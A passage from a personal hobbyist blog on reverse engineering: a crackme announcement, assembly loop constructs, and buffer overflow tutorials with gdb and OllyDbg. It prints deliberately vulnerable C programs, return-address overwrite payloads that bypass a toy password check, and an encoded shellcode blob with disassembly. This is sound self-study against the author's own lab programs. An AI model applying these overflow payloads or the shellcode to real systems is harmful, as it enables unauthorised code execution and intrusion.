Posted by: nickfnord | January 24, 2009

My First Crackme

I wrote my first crackme this week.

it can be found here:
http://www.crackmes.de/users/nickfnord/nickfnords_keygenme_1/

here’s the description:

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
An experiment in obfuscation – by Nick Fnord
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Date: 24-Jan-2009
Program Type: Consol application
Crackme Type: KeygenMe/Analysis
Difficulty Level: I think this is a 3 or 4 but as it’s my first
crackme I’m unsure.
Programming Language: C++ with a bit of inline ASM
Platform: Only tested on WinXP but as I have included the
DLL’s statically it should run on anything that
supports the PE format.

Hi All,

This is my first crackme. I made it as an excercise in obfuscation and also
to experiment with some various anti-debugger techniques. I don’t think there
is a plug in to olly that successfully takes care of all the methods I used,
but if there is, I’d be interested to know about it.

The application will ask for a username and password, and if correct will
display a fairly well known poem.

Task One:
———
Your Primary task is to write a Keygen program for it. You are permitted to
do whatever you like to the original program.

Task Two:
———
Write a tutorial detailing how you went about making the keygen. Ideally,
Describe the program in High-level pseudo-code or in words, identifying all the
anti-debugger methods used.

Hope you have many hours of enjoyment from this one.

Cheers!
Nick (NickNOSPAM[at]nickfnord[dot]com)

That pretty much sums it up. I’m quite interested to see what other people think about it and whether they rate the program higher or lower than the 3 I gave it. Most of it was written with a glass of http://www.woodfordreserve.com/Default.aspx at hand so it’s perhaps not the most efficient bit of code I’ve made, but still 馃檪

I offer a free cross link on this blog to the first person to crack it 馃檪

enjoy!

Advertisements
Posted by: nickfnord | December 9, 2008

Juvenile Shellcode

hmm – was practicing writing shellcode today and…

C:\stuff\C\fun>notepad fun.asm

Section .text
global _start:
_start
mov al, 0xb

C:\stuff\C\fun>nasm fun.asm

C:\stuff\C\fun>ndisasm fun
00000000 B00B mov al,0xb

just imagine if they taught shellcode in junior high-school…

there you go – you know how they talk about those crazy people who can read hex opcodes? well, you’re one now because you’re not going to forget that mov al, 0xb is B00B.

Posted by: nickfnord | November 24, 2008

Assembly constructs (loops)

Differing constructs on different systems.

so just a quick one this time:

I’m going through the infosec institute’s reverse engineering course and one of the fundamental things that is being enphasised is the ability to quickly recognise program constructs within assembly. This allows you to quickly skim through a dissassembled program and identify the important parts that need more attention rather than struggling to manually diasassemble everything first time.

so it turns out that as is the case with most things, this is a skill that comes with much experience. as you encounter new situations you’ll learn how to better identify these sorts of things.

take for example this very simple program below – all it does is initialise an array with all nulls, but when disassembled, it comes out three different ways depending on the compiler and the system.

here’s the original program:

int main()
{
char *array[50];
int i;

for (i=0;i<50;i++)
{
array[i] = "";
}
return 0;
}

compiled with lcc and disassembled with nasm on winXP creates a Do-While loop:

000006D4 push ebp ; set up frame
000006D5 mov ebp,esp ;
000006D7 sub esp,0xcc ; allocating space (204d)
000006DD push esi ;
000006DE push edi ;
000006DF mov dword [ebp-0x4],0x0 ; setting ebp-4 to 0 (ebp-4 = counter)
000006E6 mov edi,[ebp-0x4] ; placing counter into edi
000006E9 lea esi,[dword 0x4040a0] ; loading hard-coded value into esi
000006EF mov [ebp+edi*4-0xcc],esi ; inserting said value into array[edi]
000006F6 inc dword [ebp-0x4] ; increment counter
000006F9 cmp dword [ebp-0x4],byte +0x32 ; compare counter to 50
000006FD jl 0x6e6 ; return to start of loop if less than 50
000006FF mov eax,0x0 ; set up return value
00000704 pop edi ;
00000705 pop esi ;
00000706 leave ; clean up
00000707 ret ; return.

compiled with gcc and dissassembled with gdb on redhat linux creates a While-Do loop;

main+0: push %ebp
main+1: mov %esp,%ebp
main+3: sub $0xe8,%esp
main+9: and $0xfffffff0,%esp
main+12: mov $0x0,%eax
main+17: add $0xf,%eax
main+20: add $0xf,%eax
main+23: shr $0x4,%eax
main+26: shl $0x4,%eax
main+29: sub %eax,%esp
main+31: movl $0x0,0xffffff24(%ebp) ; move 0 into ebp (ebp is counter)
main+41: cmpl $0x31,0xffffff24(%ebp) ; start of loop, compare counter to 49
main+48: jg 0x8048381 main+77 ; if it is greater, jump to the end
main+50: mov 0xffffff24(%ebp),%eax ; stick counter into eax
main+56: movl $0x8048468,0xffffff28(%ebp,%eax,4) ; move constant value into ebp + eax * 4 (array[eax])
main+67: lea 0xffffff24(%ebp),%eax ; load value of counter pointer into eax (both pointing at same thing)
main+73: incl (%eax) ; inc value pointed at by eax
main+75: jmp 0x804835d main+41 ; jump back to start
main+77: mov $0x0,%eax ; set up return value
main+82: leave ; clean up
main+83: ret ; return

gcc and gdb on backtrack3 running in a virtual machine While-Do loop but backwards…

main+0: lea 0x4(%esp),%ecx
main+4: and $0xfffffff0,%esp
main+7: pushl 0xfffffffc(%ecx)
main+10: push %ebp
main+11: mov %esp,%ebp
main+13: push %ecx
main+14: sub $0xd0,%esp
main+20: movl $0x0,0xfffffff8(%ebp) ; setting address at top of stack to 0
main+27: jmp 0x8048352 main+46 ; Jump straight to the compare
main+29: mov 0xfffffff8(%ebp),%eax ; start of loop - putting counter into eax
main+32: movl $0x8048448,0xffffff30(%ebp,%eax,4) ; move hardcoded value to array[eax]
main+43: incl 0xfffffff8(%ebp) ; increment counter at address pointed to by ebp
main+46: cmpl $0x31,0xfffffff8(%ebp) ; compare this to 49
main+50: jle 0x8048341 main+29 ; go back to start if less than or equal to
main+52; mov $0x0, %eax ; set return address
main+57: add $0xd0,%esp ; clean up
main+63: pop %ecx
main+64: pop %ebp
main+65: lea 0xfffffffc(%ecx),%esp
main+68: ret ; return

All of these are syntactically exactly the same, but are implemented in very different ways. it is important to be able to quickly recognise these structures and to not be fooled just because there’s something that is seemingly non-sensical – it’s probably the compiler just trying to do it better.

it’s all good fun anyway 馃檪

Posted by: nickfnord | November 13, 2008

supporting legacy code

so I’ve found that I have to do a bit of maintenance on a COBOL module at work…… I’ve been avoiding it but can’t any longer. I was actually kind of curious to see what it would be like and was kind of looking forward to it, but it seems that I was a fool.

here’s just a small snippet:

IF WH-CONDITION = "Y"
SET TRUE-CONDITION TO TRUE
ELSE
SET FALSE-CONDITION TO TRUE
END-IF.

*sigh*

Posted by: nickfnord | November 1, 2008

Overflows in Linux

My Brother bought me The Shellcoder’s Handbook as an early Christmas presant and so I’ve been going through the first few chapters over the past few days. It is quite comprehensive and to my delight I found I don’t understand everything in it – which means I’m going to learn a lot as I go through it.

The first section deals with Linux, and explains that it is doing so because of the “solid, reliable, internal operating system structures” available to work with.

So I finally bit the bullet and decided to get used to using gdb. I generally dislike using command line programs of this sort, particularly after having used wonderful applications such as IDA Pro and OllyDbg, but after dragging myself kicking and screaming through a tutorial or two, I start to like it. I was also consoled by the fact that I found the vi syntax highlighting with the backtrack3 background to be damn sexy:

The following two programs are taken from the second chapter with my own notes rather than word for word from the book. One reason being I’ve found that the book has a few technical errors in it – which, in a way, is good because it means I have to understand what’s going on, the other reason is that I’m trying to solidify it in my own mind and writing this helps.

sample program 1 (reproduced from the book):

#include <stdio.h>
#include <string.h>
void return_input(void)
{
char array[30];
gets(array);
printf(“%s\n”, array);
}
main()
{
return_input();
return 0;
}

so we compile this:

cc overflow.c -o overflow

and ignore the warning about the ‘gets’ function.

running it demonstrates that all it does is take some input and pump it out again:

bt temp # ./overflow
Hello World
Hello World
bt temp #

but what happens when we put in more than 30 characters?

bt temp # ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
Segmentation fault
bt temp #

ok so just for kicks, we want to make the program display the input twice, so we open it up in gdb:

bt temp # gdb overflow
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-slackware-linux”…
Using host libthread_db library “/lib/libthread_db.so.1”.

then we disassemble the main function:


(gdb) disas main
Dump of assembler code for function main:
0x080483aa <main+0>: lea 0x4(%esp),%ecx
0x080483ae <main+4>: and $0xfffffff0,%esp
0x080483b1 <main+7>: pushl 0xfffffffc(%ecx)
0x080483b4 <main+10>: push %ebp
0x080483b5 <main+11>: mov %esp,%ebp
0x080483b7 <main+13>: push %ecx
0x080483b8 <main+14>: sub $0x4,%esp
0x080483bb <main+17>: call 0x8048384 <return_input>
0x080483c0 <main+22>: mov $0x0,%eax
0x080483c5 <main+27>: add $0x4,%esp
0x080483c8 <main+30>: pop %ecx
0x080483c9 <main+31>: pop %ebp
0x080483ca <main+32>: lea 0xfffffffc(%ecx),%esp
0x080483cd <main+35>: ret
End of assembler dump.

and take note of the address where it is calling the return_input function (0x080483bb).

dissassembling the return_input function gives us the following:

(gdb) disas return_input
Dump of assembler code for function return_input:
0x08048384 <return_input+0>: push %ebp
0x08048385 <return_input+1>: mov %esp,%ebp
0x08048387 <return_input+3>: sub $0x28,%esp
0x0804838a <return_input+6>: sub $0xc,%esp
0x0804838d <return_input+9>: lea 0xffffffe2(%ebp),%eax
0x08048390 <return_input+12>: push %eax
0x08048391 <return_input+13>: call 0x80482b0 <gets@plt>
0x08048396 <return_input+18>: add $0x10,%esp
0x08048399 <return_input+21>: sub $0xc,%esp
0x0804839c <return_input+24>: lea 0xffffffe2(%ebp),%eax
0x0804839f <return_input+27>: push %eax
0x080483a0 <return_input+28>: call 0x80482d0 <puts@plt>
0x080483a5 <return_input+33>: add $0x10,%esp
0x080483a8 <return_input+36>: leave
0x080483a9 <return_input+37>: ret
End of assembler dump.

note the two calls – one to gets and one to puts. set a breakpoint on the gets and at the ret command at the end of the function:

(gdb) break *0x08048391
Breakpoint 1 at 0x8048391
(gdb) break *0x080483a9
Breakpoint 2 at 0x80483a9

and execute

(gdb) run
Starting program: /temp/overflow

Breakpoint 1, 0x08048391 in return_input ()

now, we look back at the dissassembly of the main function and note that the next instruction after calling return_input should be 0x080483c0.

at this point, because we are in the function return_input, the eip has been pushed to the stack. so we take a snapshot of the stack:

(gdb) x/20x $esp
0xbffff270: 0xbffff28a 0x00000000 0x00000000 0x08048310
0xbffff280: 0x00000000 0x0804958c 0xbffff298 0x0804828d
0xbffff290: 0xb7fc9ff4 0xb7fc8220 0xbffff2c8 0x080483f9
0xbffff2a0: 0xb7fc9ff4 0xbffff35c 0xbffff2b8 0x080483c0
0xbffff2b0: 0xb7ff3b90 0xbffff2d0 0xbffff328 0xb7ea1df8

and see that the eip (highlighted) is sitting there nicely, ready for us to overwrite.

hit continue:

(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD

Breakpoint 2, 0x080483a9 in return_input ()

so now we’re at the return command – lets take another look at the stack:

(gdb) x/20x $esp
0xbffff2ac: 0x44444444 0xb7004444 0xbffff2d0 0xbffff328
0xbffff2bc: 0xb7ea1df8 0xb8000ce0 0x080483e0 0xbffff328
0xbffff2cc: 0xb7ea1df8 0x00000001 0xbffff354 0xbffff35c
0xbffff2dc: 0xb8001890 0x00000000 0x00000001 0x00000001
0xbffff2ec: 0x00000000 0xb7fc9ff4 0xb8000ce0 0x00000000

you can see that the address at the top of the stack just prior to execution of the ret command is a whole bunch of D’s, 6 of them in fact, meaning that because we entered 10 in, the other four must have overwritten the EBP.

going back 4 bytes in the stack confirms it:

(gdb) x/20x 0xbffff2a8
0xbffff2a8: 0x44444444 0x44444444 0xb7004444 0xbffff2d0

and continueing again confirms the overwrite of the return address:

(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()

so in anycase, now we want to overwrite the EIP with the address of the return_input function to make it output twice. so we can use the printf function to send the non-printable characters to the overflow program. we want to fill up the buffer (AAAAAAAAAABBBBBBBBBBCCCCCCCCCC), overwrite the pushed ebp (DDDD) and then overwrite the return return address with the address of the return_input function.

bt temp # printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\xbb\x83\x04\x08” | ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD禄
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD脌

Now here in The Shellcoders handbook, is an example of 1 of about 3 or so errors I’ve encountered in this chapter alone – the line in the book prints 6 D’s and not 4, causing the return address to contain 2 D’s rather than the code we passed in. don’t really know what happened to proofreading but it’s a good feeling to understand what is wrong with their examples and to be able to correct it so perhaps they put them in deliberately. (I just hope that I’m able to pick these things up as the book gets more advanced.

The book goes on to explain that we don’t necessarily always want to spawn a shell with our shellcode – sometimes exploiting the program within itself is enough. in fact it mentions that many defenses against buffer overflows are rendered useless if the atacker uses the functionality of the program to achieve their goals. – so the next example uses a buffer overflow to bypass authentication:

Here I havn’t reproduced their code at all, because I wanted to practice by myself I wrote my own program that does basically the same thing. this is based on the helloworld4 program from a previous blog.

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
int i,j;
char key[] = “NICKFNORD”;
//generate password C=p+k(mod26) and check
for(i=0,j=0;i<strlen(p);i++,j++)
{
if(j>=strlen(key))
{
j=0;
}
c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

}
}
int get_username_password()
{
char username[50];
char password[50];
char correctp[50];
int i,j;

for (i=0;i<50;i++)
{
correctp[i] = “”;
password[i] = “”;
username[i] = “”;
}

printf(“Enter Username:\n”);
fscanf(stdin,”%s”,username);
printf(“Enter Password:\n”);
fscanf(stdin,”%s”,password);
//find length of username/password, must be 8 characters
if (strlen(username) < 8 | strlen(password) < 8 )
{
printf(“invalid username/password combination”);
return 0;
}

keygen(username,correctp);

if (strcmp(correctp,password)==0)
{
return 1;
}
else
{
return 0;
}
}

int do_valid_stuff()
{
printf(“Wooo – The username and password are correct!\n exiting\n\n”);
exit (0);
}
int do_invalid_stuff()
{
printf(“Danger Danger will robinson!!!\n\n”);
exit (1);
}

int main(void)
{

if (get_username_password() )
{
do_valid_stuff();
}
else
{
do_invalid_stuff();
}
return 0;
}

and run it:

bt temp # serial
Enter Username:
AAAAAAAAAA
Enter Password:
BBBBBBBBBB
Danger Danger will robinson!!!

Awwwwww, we suck….

So the idea with this one is that we redirect the program flow to the do_valid_stuff() function. we know that there’s no validation on the input length so if we send through enough characters it will overflow.

first we find the address of the call to do_valid_stuff:

(gdb) disas main
Dump of assembler code for function main:
0x080486b0 <main+0>: lea 0x4(%esp),%ecx
0x080486b4 <main+4>: and $0xfffffff0,%esp
0x080486b7 <main+7>: pushl 0xfffffffc(%ecx)
0x080486ba <main+10>: push %ebp
0x080486bb <main+11>: mov %esp,%ebp
0x080486bd <main+13>: push %ecx
0x080486be <main+14>: sub $0x4,%esp
0x080486c1 <main+17>: call 0x804851c <get_username_password>
0x080486c6 <main+22>: test %eax,%eax
0x080486c8 <main+24>: je 0x80486d1 <main+33>
0x080486ca <main+26>: call 0x8048670 <do_valid_stuff>
0x080486cf <main+31>: jmp 0x80486d6 <main+38>
0x080486d1 <main+33>: call 0x8048690 <do_invalid_stuff>
0x080486d6 <main+38>: mov $0x0,%eax
0x080486db <main+43>: add $0x4,%esp
0x080486de <main+46>: pop %ecx
0x080486df <main+47>: pop %ebp
0x080486e0 <main+48>: lea 0xfffffffc(%ecx),%esp
0x080486e3 <main+51>: ret
End of assembler dump.

so we find we want to redirect to 0x080486ca.

then we ensure that our core will be dumped if there’s a segmentation fault:

ulimit -c unlimited

and send through a long series of characters:

bt temp # printf “AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ” | ./serial
Enter Username:
Enter Password:
Segmentation fault (core dumped)

bt temp # gdb -q -c core
(no debugging symbols found)
Using host libthread_db library “/lib/libthread_db.so.1”.
Core was generated by `./serial’.
Program terminated with signal 11, Segmentation fault.
#0 0x45454545 in ?? ()

so we know that we can overwrite the E’s with the return address

or we could have used the debugger of course and put a break point on the return command of the get_username_password function and then dumped the stack:

0x0804866b <get_username_password+335>: mov 0xfffffffc(%ebp),%edi
0x0804866e <get_username_password+338>: leave
0x0804866f <get_username_password+339>: ret
End of assembler dump.

(gdb) break *0x0804866f
Breakpoint 1 at 0x804866f
(gdb) run
Starting program: /temp/serial
Enter Username:
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Enter Password:
asdfasdfasdf

Breakpoint 1, 0x0804866f in get_username_password ()
(gdb) x/4x $esp
0xbffff31c: 0x45454545 0x46464646 0x47474747 0x48484848

demonstrating that at the return command, the last item on the stack is EEEE…

and so we modify our call to the program:

bt temp # printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEAAAABBBBCCCCDDDD\xca\x86\x04\x08" | ./serial
Enter Username:
Enter Password:
Wooo - The username and password are correct!
exiting


…and so we’ve redirected the program flow and have accessed a “secure” area of the program – yay for us.

of course, this isn’t really all that impressive in the scheme of things – I just wanted to demonstrate (to myself if no one else) the use of gdb. and writing this helps solidify this in my mind.

As it says in The Shellcoders Handbook: “Now it is time to do something useful with the vulnerability you exploited earlier. Forcing overflow.c to ask for input twice instead of once is a neat trick, but hardly something you would want to tell your friends about – ” Hey, guess what, I caused a 15 line C program to ask for input twice!” No, we want you to be cooler than that.

yes, well – coolness levels increasing ever so slightly.

Posted by: nickfnord | October 30, 2008

decoding shellcode

Just a quick post – want to find out what shellcode actually does?聽 pump it out to a file like so:

#!/usr/local/bin/perl
$shellcode .=聽 #164 bytes
“\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2”.
“\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4”.
“\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8”.
“\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c”.
“\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7”.
“\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5”.
“\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a”.
“\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9”.
“\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95”.
“\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9”.
“\x87\x61\xf1\x91”;

open (FILE, “>shellcode.bin”);
print FILE “$shellcode”;
close(FILE);

then dissassemble with nasm:

ndisasm -b 32 shellcode.bin > shellcode.asm

and you’ll get a file with the assembly:

00000000聽 29C9聽聽聽聽聽聽聽聽聽聽聽聽聽 sub ecx,ecx
00000002聽 83E9DD聽聽聽聽聽聽聽聽聽聽聽 sub ecx,byte -0x23
00000005聽 D9EE聽聽聽聽聽聽聽聽聽聽聽聽聽 fldz
00000007聽 D97424F4聽聽聽聽聽聽聽聽聽 fnstenv [esp-0xc]
0000000B聽 5B聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 pop ebx
0000000C聽 817313CAC57A1A聽聽聽 xor dword [ebx+0x13],0x1a7ac5ca
00000013聽 83EBFC聽聽聽聽聽聽聽聽聽聽聽 sub ebx,byte -0x4
00000016聽 E2F4聽聽聽聽聽聽聽聽聽聽聽聽聽 loop 0xc
00000018聽 362D3E1ACAC5聽聽聽聽聽 ss sub eax,0xc5ca1a3e
0000001E聽 F1聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 int1
0000001F聽 5F聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 pop edi
00000020聽 F6聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 db 0xF6
00000021聽 4E聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 dec esi
00000022聽 06聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 push es
00000023聽 1F聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 pop ds
00000024聽 B2C4聽聽聽聽聽聽聽聽聽聽聽聽聽 mov dl,0xc4
00000026聽 95聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 xchg eax,ebp
00000027聽 91聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 xchg eax,ecx
00000028聽 85DD聽聽聽聽聽聽聽聽聽聽聽聽聽 test ebp,ebx
0000002A聽 F1聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 int1
0000002B聽 45聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 inc ebp
0000002C聽 EAC4915341F1F1聽聽聽 jmp dword 0xf1f1:0x415391c4
00000033聽 1B24F4聽聽聽聽聽聽聽聽聽聽聽 sbb esp,[esp+esi*8]
00000036聽 BA836641BA聽聽聽聽聽聽聽 mov edx,0xba416683
0000003B聽 6E聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 outsb
0000003C聽 CD04聽聽聽聽聽聽聽聽聽聽聽聽聽 int 0x4
0000003E聽 B017聽聽聽聽聽聽聽聽聽聽聽聽聽 mov al,0x17
00000040聽 CB聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 retf
00000041聽 07聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 pop es
00000042聽 91聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 xchg eax,ecx

etc.

or you can let IDA run it’s magic on the .bin file:

which provides a bit more analysis.

…contributions are welcome for the “buy Nick IDAPro” fund.

another quick note – I’ve posted a question over at the ethical hacker forums – I’ll post the results here when they come through.

Posted by: nickfnord | October 17, 2008

Buffer overflow basics part 1

I’ve become fairly distracted over the past few weeks and never ended up finishing the previous train of blogging.聽 Partly due to the fact that I hit a wall when trying to make a keygen program for the program in the previous blog (by extracting the relevent assembly code) and partly due to the fact that I’ve found myself easily distracted by other things such as understanding buffer overflows of varying complexity and doing things setting up a VMware environment (still havn’t got it configured properly…), setting up a web server for web app testing etc – that one was fairly straightforward thankfully. – there’s so much to learn and to do, and most of it is far more interesting than learning about breaking protection.

But mostly I found this article which sort of took the wind out of me a little bit:聽 http://www.ethicalhacker.net/content/view/152/2/ – absolutely brilliant – very clear and concise introduction to reversing.聽 It was very encouraging to see that the author took a similar approach to what I did (or the other way around) it means I’m on the right track, but his article is written with so much more background knowledge that it makes mine look pathetic 馃檪聽 So I have sort of been reluctant to post anything new really.

However, taking heart in the fact that I never promised this blog to be anything except me fumbling my way through a torrent of information, I now present:

Buffer overflow basics:

Below is the code for overflowme.c:聽 Sorry for the array intro there – it’s necessary for the moment to make the stack large enough for our shellcode – more detail at the end and in the next post.

#include <stdio.h>
#include <string.h>
void copyme(char *input[])
{
char name[256];

strcpy(name,input);
}

int main(int argc, char **argv)
{
char intro[] = “Hello and welcome to buffer overflow basics, this character array really does have a purpose, it will be explained later, in reallity it is a bit of a hack but it will be used to demonstrate something later on”;
printf(“%s”,intro);
copyme(argv[1]);
return 0;
}

Buffer overflows occur when data moved into a variable on the stack continues past the bounds of the variable. For example, the function copyme in the above code declares a variable “name” as an array of char with 256 elements.聽 When the program runs, it will allocate 256 bytes on the stack when entering the function.聽聽 The strcpy function will then copy the input from the command line into the name variable.

Let’s have a quick peak at the program in ollydbg.聽 You can apply command line arguments to your olly session by going to Debug->Arguments.聽 Alternatively, you can get Perl (download and install activePerl if you don’t have it already) to do it for you, which I have found quite a bit easier seeing as we’ll be using Perl to write shellcode later on.聽 the following Perl script will execute Olly (change the path to olly to suit yours of course) and attach it to the overflowme executable with and pass “hello” in as a command line parameter:

#!/usr/local/bin/perl
$buffer = "Hello";
exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

as you step through the program, you can see that the call to our copyme function is here:


0040132B聽聽 |.聽 E8 A4FFFFFF聽聽聽聽聽聽 CALL overflow.004012D4

the whole function looks like this:

004012D4聽聽 /$聽 55聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EBP
004012D5聽聽 |.聽 89E5聽聽聽聽聽聽聽聽聽聽聽聽聽 MOV EBP,ESP
004012D7聽聽 |.聽 81EC 00010000聽聽聽聽 SUB ESP,100
004012DD聽聽 |.聽 57聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI
004012DE聽聽 |.聽 FF75 08聽聽聽聽聽聽聽聽聽聽 PUSH [ARG.1]
004012E1聽聽 |.聽 8DBD 00FFFFFF聽聽聽聽 LEA EDI,[LOCAL.64]
004012E7聽聽 |.聽 57聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI
004012E8聽聽 |.聽 E8 482E0000聽聽聽聽聽聽 CALL overflow.00404135
004012ED聽聽 |.聽 83C4 08聽聽聽聽聽聽聽聽聽聽 ADD ESP,8
004012F0聽聽 |.聽 5F聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 POP EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ;overflow.00401330
004012F1聽聽 |.聽 C9聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 LEAVE
004012F2聽聽 \.聽 C3聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 RETN

If you pay close attention to the stack at this point, you’ll notice that as the function is called, the instruction address immediatly after the CALL command is pushed onto the stack. (in our case 00401330).聽 This is called the return address and it is what the program will use to return to the main part of the program after calling the function.

onto the function:

The first thing that most functions do is called the “prolog”.聽 It pushes EBP onto the stack and moves ESP into EBP.聽 Generally this means that all function parameters will be refered to as EBP+X and all local variables will be refered to as EBP-X.聽 The function then allocates the necessary space required for local variables by moving the stack pointer the appropriate number of bytes (100 in hex = 256bytes, the size of our name variable).

The CALL line at 004012E8 is our strcpy function.

Stepping into this section, you can see that it prepares itself for the place where it copies the input string:

00404152聽聽 |.聽 F3:A4聽聽聽聽聽聽聽聽聽聽聽聽 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

This (as we found out in the binary analysis part II blog ) uses the register ECX as a counter and increments EDI and ESI.聽 at this point you can see that the ECX register is 6, which is our “Hello” string plus room a null character on the end. and we can now see that our string has been copied onto the stack:

0012FD88聽聽 6C6C6548聽 Hell
0012FD8C聽聽 8A43006F聽 o.C艩

finishing up, the function does everything in reverse – pop’s edi and then executes the LEAVE command which does the opposite of the prolog – in this case it could be expanded to be:

ADD ESP,100
MOV ESP,EBP
POP EBP

At this point, you’ll notice that the address at the top of the stack is the return pointer that we mentioned preiously and is pointing to the 00401330 address immediately after the call to the function:


0012FE8C聽聽 00401330聽 0@.聽 RETURN to overflow.00401330 from overflow.004012D4

We hit f8 again and the EIP now contains 00401330 and we’ve returned to the calling block.

But there is absolutely nothing stopping us passing in 257 or more characters and causing strcpy() to faithfully copy whatever we tell it to into the name array, dispite the fact the program only allocates 256 bytes.

Let’s try it:

#!/usr/local/bin/perl
$buffer = "A"x300;

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

If we run this perl script and step through the program again – we’ll come to the REP MOV copy command again and will note that the ECX register is set to 12D (or 301 bytes) which is the length of our input plus one for a null byte at the end.

So we know that this will write past the allocated space of 256 bytes – it causes our buffer to look like this:

0012FD84聽聽 00144C48聽 HL.
0012FD88聽聽 41414141聽 AAAA
0012FD8C聽聽 41414141聽 AAAA
0012FD90聽聽 41414141聽 AAAA
0012FD94聽聽 41414141聽 AAAA
0012FD98聽聽 41414141聽 AAAA
0012FD9C聽聽 41414141聽 AAAA
..
..
0012FE88聽聽 41414141聽 AAAA
0012FE8C聽聽 41414141聽 AAAA
0012FE90聽聽 41414141聽 AAAA
0012FE94聽聽 41414141聽 AAAA
etc.

and as we continue to step through – we get to the RETN command and find that our return address has been overwritten by “41414141”!聽 we step again and we get an error:

and if we pass the error to the program (shift+f9) we get:


A segmentation fault!聽 this means that the application tried to execute a bit of memory that it did not have permissions to access.聽 (this is a feature of modern processors running in Protected mode http://en.wikipedia.org/wiki/Protected_mode).

What we realise here is that the processor was trying to execute instructions contained at the address 41414141, an address that the user passed to it!

What if, instead of sending through a bunch of A’s, we could send through our own code, then cause the program to start executing it by pointing the return address into our code!聽 we could then cause the program to do whatever we wanted it to!

So the first thing to do is identify exactly which part of our input string overwites the return address.聽 mostly we do this by a series of educated guesses.聽聽 We know that the allocated buffer is 256 bytes long and we know that at the point the program subtracts the allocated space from the stack pointer, the stack looks like this:

0012FE88聽 /0012FF70聽 p每.
0012FE8C聽 |00401330聽 0@.聽 RETURN to overflow.00401330 from overflow.004012D4
0012FE90聽 |00144B55聽 UK.聽 ASCII "Hello"
0012FE94聽 |7C910208聽 鈥榺聽 ntdll.7C910208

that is, it will always have the previous stack frame pointer pushed on top of the return address – so we can take a guess that to overwrite the return address exactly, we’ll need 256 A’s to fill the buffer, 4 more to fill the space where ebp was pushed and then we can overwrite the return address.

so here’s our attempted perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;聽 #fills up the variable space
$buffer .= "A"x4;聽聽聽 #should overwrite the ebp address
$buffer .= "B"x4;聽聽聽 #should overwrite the return address with 42424242
$buffer .= "C"x100;聽 #if return address = 43434343 then we've padded too much

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

and it turns out:


